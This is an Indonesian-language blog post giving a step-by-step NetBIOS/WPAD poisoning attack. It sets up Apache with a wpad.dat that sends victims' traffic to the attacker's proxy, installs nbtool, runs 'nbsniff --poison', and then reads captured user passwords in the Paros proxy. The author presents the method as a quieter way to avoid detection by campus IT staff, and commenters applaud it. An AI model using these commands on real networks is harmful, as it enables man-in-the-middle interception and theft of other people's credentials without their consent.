# ray16

*—–h—————|—–7———–g—–>*

# ray16 RSS Feed
 

netbios-spoofing

nb: tekhnik berlaku hanya untuk yang konfigurasiin Browser, Lan Settings nya kayak gini

spoof pake netbios lebih enak coz? ya enggak pake ARP, lagian lebih quiet, kalo pake ARP nanti gw di aduin sama anak IT-GOS ke sini lah ke situ lah, dasar anak anak idiot

pada saat DNS tidak dapat diresolve oleh windows, maka windows bakal melakukan yang namanya WPAD (Web Proxy Auto Directory) yang dimana windows bakal mencari WPAD pada netbios gateway di dalam jaringan,

Ron, menemukan kelemahan pada saat saat dimana WPAD direquest otomatis oleh windows yang biasanya ini terjadi di tempat hotspot atau bla bla..

start apache server dan set up wpad.dat

root@bt:~# /etc/init.d/apache2 restart
root@bt:~# nano /var/www/wpad.dat

isi wpad.dat

function FindProxyForURL(url, host)
{
  return "PROXY 192.168.1.254:8080";
}

set up paros (bt4-final)

root@bt:~# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:1e:68:2e:73:4a
          inet addr:192.168.1.254  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::21e:68ff:fe2e:734a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:16301 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21978 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:13599206 (13.5 MB)  TX bytes:13336619 (13.3 MB)
          Interrupt:27 Base address:0xa000

set up (options) local proxy dengan ip 192.168.1.254 listening di 8080

download dan install nbtool

root@bt:~# svn co http://svn.skullsecurity.org:81/ron/security/nbtool
root@bt:~# cd nbtool/
root@bt:~/nbtool# make
root@bt:~/nbtool# make install

mulai poison

root@bt:~# nbsniff --poison -s 192.168.1.254

cek password user di paros

mari dukung gerakan Anti-ASSLAB.

ref: http://www.skullsecurity.org/blog/


## E O F
/* Wanna Share? */
  • Print
  • Digg
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • email
  • PDF
  • Slashdot
  • StumbleUpon
  • Technorati
  • BarraPunto
  • Bitacoras.com
  • HackerNews
  • Ping.fm
  • Reddit
  • RSS
  • Twitter
  • Yahoo! Bookmarks
  • Yahoo! Buzz
  • BlinkList
  • blogmarks
  • Blogosphere News
  • blogtercimlap
  • connotea
  • Current
  • Design Float
  • Diigo
  • DotNetKicks
  • DZone
  • eKudos
  • Fark
  • Faves
  • Fleck
  • FriendFeed
  • FSDaily
  • Global Grind
  • Gwar
  • Haohao
  • HealthRanker
  • HelloTxt
  • Hemidemi
  • Hyves
  • Identi.ca
  • IndianPad
  • Internetmedia
  • Sphinn
  • Suggest to Techmeme via Twitter
  • ThisNext
  • Tipd
  • Tumblr
  • Upnews
  • Webnews.de
  • Webride
  • Wikio
  • Wikio FR
  • Wikio IT
  • Wists
  • Wykop
  • Xerpi
  • Yigg
  • Kirtsy
  • laaik.it
  • LinkaGoGo
  • LinkArena
  • LinkedIn
  • Linkter
  • Live
  • Meneame
  • MisterWong
  • MisterWong.DE
  • Mixx
  • MSN Reporter
  • muti
  • MyShare
  • MySpace
  • N4G
  • Netvibes
  • Netvouz
  • NewsVine
  • NuJIJ
  • Posterous
  • Propeller
  • Ratimarks
  • Rec6
  • Scoopeo
  • Segnalo
  • Simpy
  • Socialogs
  • SphereIt
  • Add to favorites
  • Blogplay
  • Diggita
  • LaTafanera
  • MOB
  • QQ书签
  • SheToldMe
  • viadeo FR
  • 豆瓣
  • 豆瓣九点

2 Responses to “netbios-spoofing”

  1. 1
    oneo:

    kut nyimak aja ..hahah :D

  2. 2
    Iccang:

    keren bro….

    perbanyak lagi pencerahan yg spt ini, salute….

Leave a Reply